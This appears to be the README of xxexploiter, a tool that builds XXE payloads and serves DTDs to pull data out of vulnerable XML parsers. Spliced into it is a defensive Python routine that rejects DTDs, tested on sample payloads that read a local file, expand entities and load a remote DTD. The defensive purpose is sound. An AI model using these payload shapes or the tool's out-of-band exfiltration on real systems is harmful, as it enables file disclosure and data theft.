xxexploiter: Tool to help exploit XXE vulnerabilities
It generates the XML payloads and automatically starts a server to serve the needed DTDs or to receive exfiltrated data.
If you choose OOB or CDATA mode, XXExploiter generates the necessary DTD to be included and starts a server to host it. Bear in mind that with these options you must set the server address.
If you include content in the body of the XML, bear in mind that XML-restricted characters such as '<' may break parsing, so be sure to use CDATA or PHP's base64encode.
Most languages limit the number of entity expansions, or the total length of the expanded content, so make sure you test XEE on your own machine first, under the same conditions as the target.
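The DTD loading and entity expansion described above are exactly what an XML-consuming endpoint should refuse before the document ever reaches the application parser. The following is an added example and not part of xxexploiter or its author's code: a hardened parse routine built on Python's standard-library expat bindings that aborts on any DOCTYPE, entity declaration or external entity reference, with constructed sample documents (the function names, the placeholder host and the sample requests are all assumptions for the self-test).

```python
# Added example (not part of xxexploiter): server-side hardened XML parsing.
# Assumes only the Python standard library. Sample documents are constructed.
import xml.etree.ElementTree as ET
import xml.parsers.expat


class UnsafeXMLError(ValueError):
    """Document carries a DOCTYPE, entity declaration or external reference."""


def check_dtd_free(data: bytes) -> None:
    """First pass with raw expat: abort on the first DTD-related event.

    Expat does not fetch external entities unless an ExternalEntityRefHandler
    does so, but refusing the DOCTYPE outright also stops internal entity
    expansion (XEE) and out-of-band DTD loading before they begin.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXMLError(f"DOCTYPE for <{name}> refused")

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXMLError(f"entity declaration {name!r} refused")

    def on_external_ref(context, base, sysid, pubid):
        raise UnsafeXMLError(f"external entity {sysid!r} refused")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    try:
        parser.Parse(data, True)
    except xml.parsers.expat.ExpatError as exc:
        raise UnsafeXMLError(f"malformed XML: {exc}") from exc


def parse_xml_safely(data: bytes) -> ET.Element:
    """Parse untrusted XML only after the DTD-free check passes."""
    check_dtd_free(data)
    return ET.fromstring(data)


def classify(data: bytes) -> str:
    """Return 'ok' for an accepted document, else 'refused: <reason>'."""
    try:
        parse_xml_safely(data)
    except UnsafeXMLError as exc:
        return f"refused: {exc}"
    return "ok"


# Constructed sample requests, as an XML-consuming endpoint might receive them.
BENIGN = b"<order><id>42</id><item>widget</item></order>"

# External entity pointing at a local file: the basic XXE shape.
EXTERNAL_ENTITY = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE order [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>'
    b"<order><id>&xxe;</id></order>"
)

# Internal entities that expand each other: the XEE shape the text warns about.
INTERNAL_EXPANSION = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE order [<!ENTITY a "aaaaaaaa"><!ENTITY b "&a;&a;&a;&a;">]>'
    b"<order><id>&b;</id></order>"
)

# Parameter entity loading a hosted DTD: the OOB shape (placeholder host).
REMOTE_DTD = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE order [<!ENTITY % remote SYSTEM "http://dtd-host.example/x.dtd">%remote;]>'
    b"<order><id>1</id></order>"
)

if __name__ == "__main__":
    samples = [("benign", BENIGN), ("external entity", EXTERNAL_ENTITY),
               ("internal expansion", INTERNAL_EXPANSION), ("remote dtd", REMOTE_DTD)]
    for label, doc in samples:
        print(f"{label:20s} -> {classify(doc)}")
```

The check runs as a separate pre-parse pass rather than as a configuration of ElementTree, so the same function can sit in front of whatever parser the application actually uses; the three handlers are defence in depth, since the DOCTYPE handler alone already rejects every document that could declare an entity.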
npm install -g xxexploiter
Simple payload Generation
Automating request to send payload
OOB Extraction with automated request
Copyright (c) 2020 Luis Fontes